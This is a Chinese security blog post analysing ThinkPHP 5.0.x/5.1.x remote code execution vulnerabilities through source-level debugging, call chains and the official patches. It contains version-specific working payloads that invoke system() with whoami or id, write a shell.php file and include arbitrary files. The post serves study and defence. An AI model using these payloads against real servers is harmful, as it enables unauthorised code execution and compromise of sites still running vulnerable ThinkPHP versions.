<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="ThinkPHP5.0.x RCE分析"><meta name="keywords" content=""><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>ThinkPHP5.0.x RCE分析 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE%E4%B9%8B%E8%B0%83%E7%94%A8%E4%BB%BB%E6%84%8F%E7%B1%BB%E7%9A%84%E4%BB%BB%E6%84%8F%E6%96%B9%E6%B3%95"><span class="toc-number">1.</span> <span class="toc-text">RCE之调用任意类的任意方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0"><span class="toc-number">1.1.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">1.3.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE%E4%B9%8B%E8%B0%83%E7%94%A8Request%E7%B1%BB%E4%BB%BB%E6%84%8F%E6%96%B9%E6%B3%95"><span class="toc-number">2.</span> <span class="toc-text">RCE之调用Request类任意方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#thinkphp5-0-8%E3%80%81-debug-x3D-false"><span class="toc-number">2.2.1.</span> <span class="toc-text">thinkphp5.0.8、 debug&#x3D;false</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#thinkphp5-0-14%E3%80%81debug-x3D-true"><span class="toc-number">2.2.2.</span> <span class="toc-text">thinkphp5.0.14、debug&#x3D;true</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#thinkphp5-0-7%E3%80%81debug-x3D-false"><span class="toc-number">2.2.3.</span> <span class="toc-text">thinkphp5.0.7、debug&#x3D;false</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#thinkphp5-0-21%E3%80%81debug-x3D-true"><span class="toc-number">2.2.4.</span> <span class="toc-text">thinkphp5.0.21、debug&#x3D;true</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-1"><span class="toc-number">2.3.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">81</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">17</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">16</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">ThinkPHP5.0.x RCE分析</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2022-11-08</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/ThinkPHP/">ThinkPHP</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.4k</span><span class="post-meta__separator">|</span><span>阅读时长: 9 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>thinkphp中的RCE漏洞比较出名，在这里从源码层面分析学习。</p>
<span id="more"></span>

<h1 id="RCE之调用任意类的任意方法"><a href="#RCE之调用任意类的任意方法" class="headerlink" title="RCE之调用任意类的任意方法"></a>RCE之调用任意类的任意方法</h1><h2 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>ThinkPHP 底层没有对控制器名进行很好的合法性校验，导致在未开启强制路由的情况下，用户可以调用任意类的任意方法，最终导致rce的产生。</p>
<p>漏洞影响版本： 5.0.7&lt;&#x3D;5.0.x&lt;&#x3D;5.0.22 、5.1.0&lt;&#x3D;5.1.x&lt;&#x3D;5.1.30</p>
<p>payload：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">5.0.x ：</span></span><br><span class="line">?s=index/think\config/get&amp;name=database.username     # 获取配置信息</span><br><span class="line">?s=index/\think\Lang/load&amp;file=../composer.json      # 包含任意文件</span><br><span class="line">?s=index/\think\Config/load&amp;file=../test.php         # 包含任意.php文件</span><br><span class="line">?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[]=system&amp;vars[][]=id</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">5.1.x ：</span></span><br><span class="line">?s=index/\think\Request/input&amp;filter[]=system&amp;data=pwd</span><br><span class="line">?s=index/\think\view\driver\Php/display&amp;content=&lt;?php phpinfo();?&gt;</span><br><span class="line">?s=index/\think\template\driver\file/write&amp;cacheFile=shell.php&amp;content=&lt;?php phpinfo();?&gt;</span><br><span class="line">?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[]=system&amp;vars[][]=id</span><br><span class="line">?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[]=system&amp;vars[][]=id</span><br></pre></td></tr></table></figure>


<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>使用这个payload来分析：<code>?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[]=system&amp;vars[][]=id</code></p>
<p>使用thinkphp 5.0.10，默认有index的模块，发送以上payload，下断点调试。</p>
<p>从这里开始<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311527589.png"></p>
<p>跟进<code>App::run()</code>，这里自动加载App类，跳出即可</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311528651.png"></p>
<p>run函数里先进行了初始化（<code>self::initCommon()</code>），之后加载语言包，我们重点关注路由检测<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311530615.png"></p>
<p>跟进<code>self::routeCheck</code>，这里先使用<code>$request-&gt;path()</code>获取到了我们通过<code>s</code>传入的值，之后进行路由检测。<br>在第563行，会读取配置中的<code>url_route_must</code>值，表示是否强制使用路由，默认是false的，所以才能进入下一步。</p>
<blockquote>
<p>官方最开始的修复方案之一就是将<code>url_route_must</code>设置为true</p>
</blockquote>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311537156.png"></p>
<p>之后继续进入571行的<code>Route::parseUrl</code>，可以看到这里将url解析为了模块、控制器和操作，而这三个都是从<code>$path</code>数组中取得的，<code>$path</code>数组由1212行的<code>self::parseUrlPath</code>返回</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311543228.png"></p>
<p>跟进1212行的<code>self::parseUrlPath</code>，可以看到就是将url以<code>/</code>打散为数组<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311546370.png"></p>
<p>解析url完成后，得到了模块、控制器和操作。之后会使用<code>self::exec</code>来执行请求。<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311547223.png"></p>
<p>跟进123行的<code>exec</code>，执行的是一个模块<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311552257.png"></p>
<p>继续跟进，默认是支持多模块的，之后会判断模块是否存在（模块在application目录下，一个模块是一个文件夹），已经模块是否已经被禁用</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311554893.png"></p>
<p>之后获取控制器名和操作名，实例化控制器，最后调用<code>self::invokeMethod</code>来反射调用函数。</p>
<p>可见这里没有一点点过滤的操作，只是判断了控制器是否存在，操作是否存在等，其本质就是判断类和类中的函数存不存在。</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311604115.png"></p>
<p>跟进<code>invokeMethod</code>，先使用反射实例化了类，之后使用<code>self::bindParams</code>获取参数，最后使用<code>$reflect-&gt;invokeArgs</code>实现调用。</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311609222.png"></p>
<p>跟进<code>self::bindParams</code>，看一下参数是怎么传进来的</p>
<p>可以看到使用了<code>Request::instance()-&gt;param()</code>获取请求的参数，之后按照所调用的函数所需要的参数变量名来设置参数。</p>
<p>所以我们调用什么函数就传入该函数所需要的参数值就可以了</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311613471.png"></p>
<p>漏洞最终触发点在197行的<code>$reflect-&gt;invokeArgs</code></p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311616740.png"></p>
<p>在之后就是调用了我们传入的<code>think\app</code>的<code>invokefunction</code>函数，其执行我们传入的函数和参数</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311639046.png"></p>
<p>整个调用链为：</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311643827.png"></p>
<p>其实这整个过程就是是thinkphp的生命周期的一部分，问题出在没有对用户输入的控制器名字进行检测和过滤，导致可以实例化任意类，执行类中的任意方法，而且还可以自行传入参数。</p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>官方的修复方案是对控制器进行正则过滤</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202210311624293.png"></p>
<h1 id="RCE之调用Request类任意方法"><a href="#RCE之调用Request类任意方法" class="headerlink" title="RCE之调用Request类任意方法"></a>RCE之调用Request类任意方法</h1><p>5.0.10开始默认debug为false</p>
<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>thinkphp在获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。</p>
<p>payload：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">5.0.8 ~ 5.0.20（5.0.14及以后需要debug=<span class="literal">true</span>）</span></span><br><span class="line">POST /?s=index</span><br><span class="line">_method=__construct&amp;filter=system&amp;a=whoami</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">5.0.21 ~ 5.0.23（需要debug=<span class="literal">true</span>）</span></span><br><span class="line">POST /</span><br><span class="line">_method=__construct&amp;filter=system&amp;server[REQUEST_METHOD]=whoami</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">5.0.2 ~ 5.0.23（5.0.14及以后需要debug=<span class="literal">true</span>），需要存在xxx的method路由，例如captcha</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">5.1.0 ~ 5.1.6 （除了5.1.0以外，别的需要debug=<span class="literal">true</span>）</span></span><br><span class="line">POST /?s=xxx HTTP/1.1</span><br><span class="line">_method=__construct&amp;filter=system&amp;method=get&amp;a=whoami</span><br></pre></td></tr></table></figure>

<h2 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h3 id="thinkphp5-0-8、-debug-x3D-false"><a href="#thinkphp5-0-8、-debug-x3D-false" class="headerlink" title="thinkphp5.0.8、 debug&#x3D;false"></a>thinkphp5.0.8、 debug&#x3D;false</h3><p>使用的payload如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /?s=index</span><br><span class="line">_method=__construct&amp;filter=system&amp;a=whoami</span><br></pre></td></tr></table></figure>

<p>漏洞rce的执行点位于Request.php的<code>filterValue</code>函数，的<code>call_user_func</code>函数，这里通过控制传入<code>filterValue</code>函数的参数<code>$value</code>和<code>$filters</code>来进行rce</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211100049107.png"></p>
<p>从开始调试。</p>
<p>正常情况下，thinkphp经过了解析控制器名，操作名等之后调用<code>invokeMethod</code>执行控制器类的方法，在<code>invokeMethod</code>里，调用了<code>self::bindParams</code></p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211100053093.png"></p>
<p>跟进，其调用了Request的param函数，用来获取请求变量<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101452364.png"></p>
<p>跟进param函数，之后根据请求方式为POST，调用了post方法获取POST的参数，之后再将post的参数与GET的参数进行合并，赋值给<code>$this-&gt;param</code>。最后调用<code>$this-&gt;input</code>，对其进行过滤。<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101452165.png"></p>
<p>跟进这里的input方法，这里参数<code>name</code>值为空字符串。<br>之后使用<code>$this-&gt;getFilter</code>获取到过滤器，再调用<code>array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);</code>进行过滤操作。</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101511595.png"></p>
<p>先看看过滤器获取<code>getFilter</code>函数，其实就是获取了类成员变量<code>$this-&gt;filter</code></p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101520091.png"></p>
<p><code>array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);</code>会将<code>$data</code>数组中的每个元素传入<code>filterValue</code>函数，将<code>$filter</code>作为额外的参数</p>
<p>这里会调用<code>call_user_func</code>，来将<code>$value</code>作为参数调用<code>$filter</code>，可以看到这里的<code>$filter</code>为system，而<code>$value</code>是post的数据一个一个以此传入。<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101523731.png"></p>
<p>那么问题来了，这个<code>$filter</code>是在什么时候被赋值成为了system？</p>
<p>我们知道，这个filter其实来源于<code>Request-&gt;filter</code>的成员变量，这里直接在<code>Request</code>的构造函数中下断点，发现调用了两次<code>__construct</code></p>
<p>第二次调用是在<code>routeCheck</code>时调用的</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101539522.png"></p>
<p>在Route的check函数中，调用了<code>$request-&gt;method()</code>方法，在这里下断点，进入method函数</p>
<p>这里thinkphp为了实现请求类型伪装，设置了<code>var_method</code>的配置项，其默认值为<code>_method</code></p>
<p>可见，这里可以通过控制<code>_method</code>字段来进行类的任意方法调用，传入的参数为<code>$_POST</code><br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101543866.png"></p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.kancloud.cn/manual/thinkphp5/160568">https://www.kancloud.cn/manual/thinkphp5/160568</a><br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101546068.png"></p>
</blockquote>
<p>因此，可以通过将<code>_method</code>值设置为<code>__construct</code>，从而再次调用构造函数，利用构造函数来覆盖<code>filter</code>变量的值<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101551169.png"></p>
<p><strong>总结一下：整个利用过程只需要一个请求，可以分成两步理解</strong></p>
<p>第一步，利用请求类型伪装时的<code>_method</code>参数没有进行过滤，调用Request的<code>__construct</code>函数，重新覆盖Request对象的成员变量<code>filter</code>。</p>
<blockquote>
<p>用到的payload的<code>_method=__construct&amp;filter=system</code>部分<br>调用栈： <code>App::routeCheck</code> -&gt; <code>Route::check</code> -&gt; <code>Request::method</code> -&gt; <code>Request::__construct</code></p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101612703.png"></p>
</blockquote>
<p>第二步，在使用Request的input函数来进行过滤输入参数的时候，触发rce</p>
<blockquote>
<p>用到payload的<code>a=calc</code>部分<br>调用栈：<code> App::exec -&gt; App::module -&gt; App::invokeMethod -&gt; App::bindParams -&gt; Request::param -&gt; Request::input -&gt; array_walk_recursive -&gt; Request::filterValue -&gt; call_user_func</code></p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101611500.png"></p>
</blockquote>
<h3 id="thinkphp5-0-14、debug-x3D-true"><a href="#thinkphp5-0-14、debug-x3D-true" class="headerlink" title="thinkphp5.0.14、debug&#x3D;true"></a>thinkphp5.0.14、debug&#x3D;true</h3><p>使用的payload如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /?s=index</span><br><span class="line">_method=__construct&amp;filter=system&amp;a=whoami</span><br></pre></td></tr></table></figure>

<p>在thinkphp5.0.13中，App的module函数中添加设置了默认过滤器，导致之前我们通过<code>__construct</code>覆盖的<code>filter</code>成员变量会再次被修改</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101652570.png"></p>
<p>所以之前的利用链行不通，但是在开启了debug的情况下，在App的<code>run</code>方法中，有记录路由和请求的代码，其中调用了<code>$request-&gt;param()</code>，同样可以达到最后的rce</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101717133.png"></p>
<p><strong>调用链：</strong><br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211141145414.png"></p>
<h3 id="thinkphp5-0-7、debug-x3D-false"><a href="#thinkphp5-0-7、debug-x3D-false" class="headerlink" title="thinkphp5.0.7、debug&#x3D;false"></a>thinkphp5.0.7、debug&#x3D;false</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /?s=index HTTP/1.1</span><br><span class="line">_method=__construct&amp;filter=system&amp;method=get&amp;a=whoami</span><br></pre></td></tr></table></figure>

<p>在thinkphp5.0.7中，Route中check函数在使用<code>$request-&gt;method()</code>获取method之后，用这个method到<code>self::$rules</code>中获取数据，在这里会产生错误，从而终止程序<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101739147.png"></p>
<p>在5.0.8中，这里的rules做了一个容错，所以不会报错<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101746910.png"></p>
<p>这里使用的payload增加了一个<code>method=get</code>，因为<code>method</code>也是<code>Request</code>的一个成员变量，同样可以在执行<code>Request::__construct</code>的时候将method进行重新赋值。所以这里使用<code>method=get</code>将<code>method</code>成员变量设置为<code>get</code>，同时也达到了覆盖filter的目的。</p>
<p><strong>调用链：</strong><br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211141141936.png"></p>
<h3 id="thinkphp5-0-21、debug-x3D-true"><a href="#thinkphp5-0-21、debug-x3D-true" class="headerlink" title="thinkphp5.0.21、debug&#x3D;true"></a>thinkphp5.0.21、debug&#x3D;true</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /</span><br><span class="line">_method=__construct&amp;filter=system&amp;server[REQUEST_METHOD]=whoami</span><br></pre></td></tr></table></figure>

<p>在5.0.21中，将Request的<code>method</code>方法中获取原始请求类型的方式进行了修改</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 在5.0.21之前</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">method</span>(<span class="params"><span class="variable">$method</span> = <span class="literal">false</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="literal">true</span> === <span class="variable">$method</span>) &#123;</span><br><span class="line">        <span class="comment">// 获取原始请求类型</span></span><br><span class="line">        <span class="keyword">return</span> IS_CLI ? <span class="string">&#x27;GET&#x27;</span> : (<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;server[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>]) ? <span class="variable language_">$this</span>-&gt;server[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>] : <span class="variable">$_SERVER</span>[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>]);</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (!<span class="variable language_">$this</span>-&gt;method) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;method;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 在5.0.21及之后版本</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">method</span>(<span class="params"><span class="variable">$method</span> = <span class="literal">false</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="literal">true</span> === <span class="variable">$method</span>) &#123;</span><br><span class="line">        <span class="comment">// 获取原始请求类型</span></span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">server</span>(<span class="string">&#x27;REQUEST_METHOD&#x27;</span>) ?: <span class="string">&#x27;GET&#x27;</span>;</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (!<span class="variable language_">$this</span>-&gt;method) &#123;</span><br><span class="line">        ... </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;method;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在<code>server()</code>函数获取请求方法的时候，其内部调用了input函数来获取变量并进行过滤。<br>之前的payload<code>_method=__construct&amp;filter=system&amp;a=whoami</code>在这一步的时候，会使用我们传入的过滤器system，执行<code>system($_SERVER[REQUEST_METHOD])</code>，而返回空，从而使得<code>method</code>函数返回值为<code>GET</code>，从而之前的利用方法失败。</p>
<p>因此，这个版本的payload是<code>_method=__construct&amp;filter=system&amp;server[REQUEST_METHOD]=whoami</code></p>
<p>通过覆盖<code>$_SERVER[REQUEST_METHOD]</code>变量，使得其在<code>input</code>的时候就进行rce</p>
<p><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211141135867.png"></p>
<p><strong>调用链：</strong><br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211141137672.png"></p>
<h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>漏洞修复是在Request的method函数获取_method变量后对其进行过滤：<br>修复前：<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101623410.png"></p>
<p>修复后：<br><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202211101624415.png">a</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2022/11/08/thinkphp/thinkphp5.0.x RCE分析/">http://dar1in9s.github.io/2022/11/08/thinkphp/thinkphp5.0.x RCE分析/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2022/11/10/thinkphp/thinkphp%20pop%E9%93%BE%E5%88%86%E6%9E%90/"><i class="fa fa-chevron-left">  </i><span>ThinkPHP POP链分析</span></a></div><div class="next-post pull-right"><a href="/2022/11/03/thinkphp/thinkphp5%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/"><span>ThinkPHP5源码分析</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2023 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script 